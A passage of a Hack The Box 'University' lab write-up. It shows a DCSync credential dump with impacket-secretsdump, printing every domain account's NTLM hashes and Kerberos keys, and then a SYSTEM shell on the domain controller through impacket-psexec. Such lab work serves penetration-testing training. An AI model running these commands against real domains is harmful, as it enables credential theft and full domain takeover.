DCSync
Following the result of the password spray attack, almost every user in the domain shares the same password, including the DA user; choco.l
┌──(kali㉿kali)-[~/archive/htb/labs/university]
└─$ KRB5CCNAME=choco.l@dc.university.htb.ccache impacket-secretsdump UNIVERSITY.HTB/@dc.university.htb -k -no-pass -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x7704a47762a8cd07d2922fc3e97e02a4
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e1ab6bc4d7d84111fe3e0fb271de1e0b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
UNIVERSITY\DC$:plain_password_hex:e97478a1793c33f8f9a11b182653d4c9e62c86d8b6e0a3d73196a9470144a56d3e5c1e9db75e8cc6b580e95a6a5094ef929ea1ede9ac3c890d2103cc2babc001c6bc6d1f501bf69f293b2edd261e6d2a78f7f548efb1bdaf579ff29aada34007b64f40324cedbe67ad19e78760883f63198000caff9ad2f4606b7ebdd8aa2c6c3d573fc3dec04ad378f3e9c00e0017b907bc227daa76db77910961120fc47e8fe605532a350a3096442e2efd4a6227f049c221f8e4a0b27d5bade63d7605438fd088e788815524c8484d2ec7fc11c2ea0a98ca014f819afee1a3da79cd9ea29662456e1006e9460201a6757f46759d18
UNIVERSITY\DC$:aad3b435b51404eeaad3b435b51404ee:2522eb84c83b5e9ffde18045be5b9e59:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x44e8899b6f107411270e6b698b1cfde82435f5c4
dpapi_userkey:0x0616b9ece51544c0f81f1c19a4cb7812aee0feb6
[*] NL$KM
0000 88 46 0A 2B AA 91 13 80 6D 4A AD D2 F2 50 9C 46 .F.+....mJ...P.F
0010 7D 95 DC 66 C9 3C 55 2F 92 18 48 6C DB 31 BE 07 }..f.<U/..Hl.1..
0020 67 23 06 25 47 36 40 FC 4E 03 EC E7 CB C4 28 F8 g#.%G6@.N.....(.
0030 00 67 45 08 B9 31 29 E4 E6 9F 6D 5B 07 F7 96 09 .gE..1)...m[....
NL$KM:88460a2baa9113806d4aadd2f2509c467d95dc66c93c552f9218486cdb31be0767230625473640fc4e03ece7cbc428f800674508b93129e4e69f6d5b07f79609
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e63413bab01a0b8820983496c0be3a9a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:41c4599e48661690fa6538fe96d366de:::
university.htb\John.D:1103:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
university.htb\George.A:1104:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
WAO:1106:aad3b435b51404eeaad3b435b51404ee:da49675b9d3d5e403fa3c1c6b5c3f5a2:::
university.htb\hana:1107:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
karma.watterson:1108:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Alice.Z:1109:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Steven.P\Steven.P:1110:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Karol.J\Karol.J:1111:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Leon.K\Leon.K:1112:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Anna.C\A.Crouz:1113:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Kai.K\Kai.K:1114:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Arnold.G\Arnold.G:1115:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Kareem.A\Kareem.A:1116:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Lisa.K\Lisa.K:1117:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Jakke.C\Jakken.C:1118:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Nya.R\Nya.R:1119:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Brose.W\Brose.W:1120:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Choco.L\Choco.L:1121:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Rose.L\Rose.L:1122:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Emma.H\Emma.H:1123:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
C.Freez\C.Freez:1124:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Martin.T\Martin.T:1127:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
William.B\William.B:1132:aad3b435b51404eeaad3b435b51404ee:a910f374f7e63717f112fb4e40122a7c:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:2522eb84c83b5e9ffde18045be5b9e59:::
WS-3$:1134:aad3b435b51404eeaad3b435b51404ee:b51c7661e82feb147afffb324d91af34:::
GMSA-PClient01$:1140:aad3b435b51404eeaad3b435b51404ee:e5799ed7c404dead98cbe2fc610b9b1f:::
WS-1$:1141:aad3b435b51404eeaad3b435b51404ee:c23b84b12d7f2c758e4ca7da5b053c81:::
WS-2$:1142:aad3b435b51404eeaad3b435b51404ee:bfd5d3a7883cb6e0a63a29d0cdfd430c:::
WS-4$:1143:aad3b435b51404eeaad3b435b51404ee:c591cf4bcad09cc0eb5ba2b54e58b217:::
WS-5$:1144:aad3b435b51404eeaad3b435b51404ee:7427ac9458a4a39f5076ab080b1329b3:::
LAB-2$:1145:aad3b435b51404eeaad3b435b51404ee:93b3bf5940c921c6f072961d10c3f43f:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:57165230d0d19617ca0963b38799c474dead2e2e0ecab979b3112686a51820d3
Administrator:aes128-cts-hmac-sha1-96:7ff72d9d3f65a3efa1fdae60fbb0d5f3
Administrator:des-cbc-md5:f2f17f2c16463886
krbtgt:aes256-cts-hmac-sha1-96:52ce53d2030dd2687b36bec21c329f04b74938dc1e7793a93c4c9980835c7ef3
krbtgt:aes128-cts-hmac-sha1-96:79cdade7f3d4cfc5398ff6f82f4335ae
krbtgt:des-cbc-md5:fb7fae5ece8f9879
university.htb\John.D:aes256-cts-hmac-sha1-96:21dd09fe9814cab35b8cbc0f8195fb3d1264fd547317939e6a130ce3eb6b4511
university.htb\John.D:aes128-cts-hmac-sha1-96:10b1a2d48d658e4b1105e86e83f756dc
university.htb\John.D:des-cbc-md5:5bae86cdead37531
university.htb\George.A:aes256-cts-hmac-sha1-96:f6eb3c5bf98fdfb635b3c6da6ae98dc891e1ce3780d2e2ec2651c7f4eb983a40
university.htb\George.A:aes128-cts-hmac-sha1-96:6de8f3cdec17069761798c9029869298
university.htb\George.A:des-cbc-md5:29f7fedca13eb51a
WAO:aes256-cts-hmac-sha1-96:048f13833165f244e42d3c504243b93299b89ae3cd3f77f1e44072295977f8dc
WAO:aes128-cts-hmac-sha1-96:dae044fa1a5127dc73c1227cce87138e
WAO:des-cbc-md5:3b0b7fe99e0dd029
university.htb\hana:aes256-cts-hmac-sha1-96:e6672076fc6ff185b3b5b16b7748e1c2d79b082acc0e131005951a77b11a4183
university.htb\hana:aes128-cts-hmac-sha1-96:3ee719263aae39bc92fbb09bef9eee00
university.htb\hana:des-cbc-md5:bfec899213df4651
karma.watterson:aes256-cts-hmac-sha1-96:691ee7af21e7a7658d4f481a11e3b782eee8a94bb0ccb346ef254849545a8ed4
karma.watterson:aes128-cts-hmac-sha1-96:79bd278f4872e5b069a85e4d449ef02f
karma.watterson:des-cbc-md5:f20837bc94f10dfe
Alice.Z:aes256-cts-hmac-sha1-96:d82c6840941ac7267c79a322b9c7caa24fe1fe656d2624aeba6f32623296525e
Alice.Z:aes128-cts-hmac-sha1-96:efd562ce518fd8aabba4d9d2edef346c
Alice.Z:des-cbc-md5:cd2549808f75343b
Steven.P\Steven.P:aes256-cts-hmac-sha1-96:5707911aa507f986eea4c1d5f87ccf79f0a9de45f4a36f940c8bbd898e5e41bb
Steven.P\Steven.P:aes128-cts-hmac-sha1-96:bba36f53925ccb71e21cdb383ed67a0b
Steven.P\Steven.P:des-cbc-md5:ae1c45a23289190b
Karol.J\Karol.J:aes256-cts-hmac-sha1-96:56103c4cf610a125a6a23823c209dcdbe199ade01f94da4d332b01068bd6a740
Karol.J\Karol.J:aes128-cts-hmac-sha1-96:c9a2f8992302e113938d7750026f901c
Karol.J\Karol.J:des-cbc-md5:68e331b6dc2ad98c
Leon.K\Leon.K:aes256-cts-hmac-sha1-96:1ece984548eb4eba3c523bd3d2328e902ce479fdfb727099380f68f5a0d2cb49
Leon.K\Leon.K:aes128-cts-hmac-sha1-96:848593e19936039550019f28444a3da0
Leon.K\Leon.K:des-cbc-md5:c851b58316c8ce25
Anna.C\A.Crouz:aes256-cts-hmac-sha1-96:14574495c3560a737b1762d55472c20b556077aa4794f9694cc28c59705a42fe
Anna.C\A.Crouz:aes128-cts-hmac-sha1-96:3f018e7682f353b16cc7b620a0ef2f8c
Anna.C\A.Crouz:des-cbc-md5:1aa8a2ce75700115
Kai.K\Kai.K:aes256-cts-hmac-sha1-96:438fb0fbb03ef035a5853f9495f62b761fe14016039249d042b6cfbe5f111390
Kai.K\Kai.K:aes128-cts-hmac-sha1-96:e2d4eae38d843778e3a14f87377b4d37
Kai.K\Kai.K:des-cbc-md5:589def32ba38cb16
Arnold.G\Arnold.G:aes256-cts-hmac-sha1-96:4399fe126980a15d35bf04c8fef4055f411c8c856e7f5225e16c46c07342f127
Arnold.G\Arnold.G:aes128-cts-hmac-sha1-96:c5053f4f0840bda9ad2f13ba63ccbbbf
Arnold.G\Arnold.G:des-cbc-md5:32297623943723e0
Kareem.A\Kareem.A:aes256-cts-hmac-sha1-96:d0b4d84027baa07382b6b7e1db90f492316f2e2ebf103034ef90430f08739d4c
Kareem.A\Kareem.A:aes128-cts-hmac-sha1-96:8d70f6949ea4870a7558a285c579fd67
Kareem.A\Kareem.A:des-cbc-md5:022f34d3764f37f2
Lisa.K\Lisa.K:aes256-cts-hmac-sha1-96:5e4f6bd9805046070c85445d9475e3bab9bb5d136483ef06871c585f57f15a52
Lisa.K\Lisa.K:aes128-cts-hmac-sha1-96:4c4d6872dd1eaba8743844570bd1d93d
Lisa.K\Lisa.K:des-cbc-md5:e3510225071f7abc
Jakke.C\Jakken.C:aes256-cts-hmac-sha1-96:4c8a5426d5dbd5ab2eeca3d75075df687126a61fc94253c8edbedfe61243a58a
Jakke.C\Jakken.C:aes128-cts-hmac-sha1-96:2008f8400116981ca13052818b8b015f
Jakke.C\Jakken.C:des-cbc-md5:3b08b343ba0eb0b6
Nya.R\Nya.R:aes256-cts-hmac-sha1-96:fa49f32f8bceda29f095bbce0f6b421e4b5b46f497b5c0613758ff46ed12e18e
Nya.R\Nya.R:aes128-cts-hmac-sha1-96:6578cef55b3cad6ba22e83886cdeab7e
Nya.R\Nya.R:des-cbc-md5:b994f4d910ae01c2
Brose.W\Brose.W:aes256-cts-hmac-sha1-96:1113b12ff5b32fbda629aa1d5b841dcd049302fac33f0f7420313d4ed572d900
Brose.W\Brose.W:aes128-cts-hmac-sha1-96:da6945c6a3f4faddcad139f07a79f4b2
Brose.W\Brose.W:des-cbc-md5:703b0294f87968c2
Choco.L\Choco.L:aes256-cts-hmac-sha1-96:80f15a8852e6fd430ae10e0fdd5c4e4b2adac39a2a6d3f990ad198f50634fc26
Choco.L\Choco.L:aes128-cts-hmac-sha1-96:18af98f4bbadbe494f0c562ff81f3d51
Choco.L\Choco.L:des-cbc-md5:c494253bd35289b0
Rose.L\Rose.L:aes256-cts-hmac-sha1-96:94296b923765c8a823d3f3cdfd08207bcb5db26354080c82bbbcf4fbcdcf3836
Rose.L\Rose.L:aes128-cts-hmac-sha1-96:aaddb9f3fa962b4b34f4c4a5356df925
Rose.L\Rose.L:des-cbc-md5:469b6713c4292a5b
Emma.H\Emma.H:aes256-cts-hmac-sha1-96:05ce732c932e48edd7328a5af7b949519ade7d231616cce6c61406cb9e00231c
Emma.H\Emma.H:aes128-cts-hmac-sha1-96:1ec8641fe93994c480aa780d91017104
Emma.H\Emma.H:des-cbc-md5:62bf26da3b0b0b58
C.Freez\C.Freez:aes256-cts-hmac-sha1-96:68ce938782346c294888702a8f5c804dd5ca5ad794ad5fd0b0ad91e303bc1e98
C.Freez\C.Freez:aes128-cts-hmac-sha1-96:a382a211f93529aecf18ee77a29ab859
C.Freez\C.Freez:des-cbc-md5:6454387a684545df
Martin.T\Martin.T:aes256-cts-hmac-sha1-96:aab6592eb571149292bdf548ecfbbb9132956ef8fdccee4cf6234ac76a0298e8
Martin.T\Martin.T:aes128-cts-hmac-sha1-96:ea989c266229d4aaf5dbaa4463e33747
Martin.T\Martin.T:des-cbc-md5:07d525d957201a15
William.B\William.B:aes256-cts-hmac-sha1-96:983519579faa3198d9530cac738836a56df853eb096dac33ce4aa88fc5a31e3e
William.B\William.B:aes128-cts-hmac-sha1-96:d133f6d4851b032289ec98a662acbd39
William.B\William.B:des-cbc-md5:0e5431b02a68b557
DC$:aes256-cts-hmac-sha1-96:1e28d41c5f05d6d11bb85093b1dd37796d526e747f51aa75ab4cad3f3c90bfe7
DC$:aes128-cts-hmac-sha1-96:dd4911edcf56d2626325632928d0f45c
DC$:des-cbc-md5:9b58ab8a892fa81c
WS-3$:aes256-cts-hmac-sha1-96:2f406f2fbc41fc6bdf08c7b49d048b145f595664ed770e33d1210c8ddeea43ed
WS-3$:aes128-cts-hmac-sha1-96:9536bafcc7f0f3eaa75666ce9dda4529
WS-3$:des-cbc-md5:dc2a76264abcfbfe
GMSA-PClient01$:aes256-cts-hmac-sha1-96:352cdbf0cd78625979044b7c084f4e2389b7ce574149908d6f7667bc9257dce8
GMSA-PClient01$:aes128-cts-hmac-sha1-96:dc67dee2694935710c5266115b41529d
GMSA-PClient01$:des-cbc-md5:a74f8a2cf7348083
WS-1$:aes256-cts-hmac-sha1-96:053d04f5d4bf72f11b17f4ef1f123da28587a24ae6d87006460ea721f53d5cf3
WS-1$:aes128-cts-hmac-sha1-96:2075e3e815e44ca3853d562c4a9c5453
WS-1$:des-cbc-md5:bad532a2a74f2a94
WS-2$:aes256-cts-hmac-sha1-96:45d320e28768dd31c13ccc4fc3186eb52104d480ad761d5cdc5bc54921a5d2c3
WS-2$:aes128-cts-hmac-sha1-96:f3a18ccdcadd1b0f9fa86720dc3730fe
WS-2$:des-cbc-md5:c1169115cb7c8c67
WS-4$:aes256-cts-hmac-sha1-96:57676ebc2adde9b1ad0c11126c330db1b561378f50b5298285d6120225ab7b2d
WS-4$:aes128-cts-hmac-sha1-96:fb811618c2a0938d27c45a64e78ca131
WS-4$:des-cbc-md5:dc4cb962e9252f2a
WS-5$:aes256-cts-hmac-sha1-96:efcc09c0abf92483eaa0cc85b7fbb200abcac40050ce34e92c433d2d40315871
WS-5$:aes128-cts-hmac-sha1-96:2e1145b05af8761e092c724435424044
WS-5$:des-cbc-md5:08c8c49d3e2c5ee9
LAB-2$:aes256-cts-hmac-sha1-96:053aa90f8888c1fbafa79d6e1eab4a8f1e9d8c93a3cc3e6977a37e475a0969cb
LAB-2$:aes128-cts-hmac-sha1-96:630cd5f5d00deb7f1cf8750c9e7028db
LAB-2$:des-cbc-md5:3815c8df0e231cf4
[*] Cleaning up... Domain Level Compromise
Shell Drop
┌──(kali㉿kali)-[~/archive/htb/labs/university]
└─$ KRB5CCNAME=choco.l@dc.university.htb.ccache impacket-psexec UNIVERSITY.HTB/@dc.university.htb -k -no-pass -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on dc.university.htb.....
[*] Found writable share ADMIN$
[*] Uploading file nAlKTeRa.exe
[*] Opening SVCManager on dc.university.htb.....
[*] Creating service fQOw on dc.university.htb.....
[*] Starting service fQOw.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.6414]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
DC
C:\Windows\system32> ipconfig
Windows IP Configuration
Ethernet adapter vEthernet (Internal-VSwitch1):
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::47c0:fbc9:2d7b:e4bb%6
IPv4 Address. . . . . . . . . . . : 192.168.99.1
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : dead:beef::ea3:fdc0:ca7d:1115
Link-local IPv6 Address . . . . . : fe80::c7da:e232:b312:1a1f%4
IPv4 Address. . . . . . . . . . . : 10.10.11.39
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1bd3%4
10.10.10.2System Level Compromise on the dc.university.htb host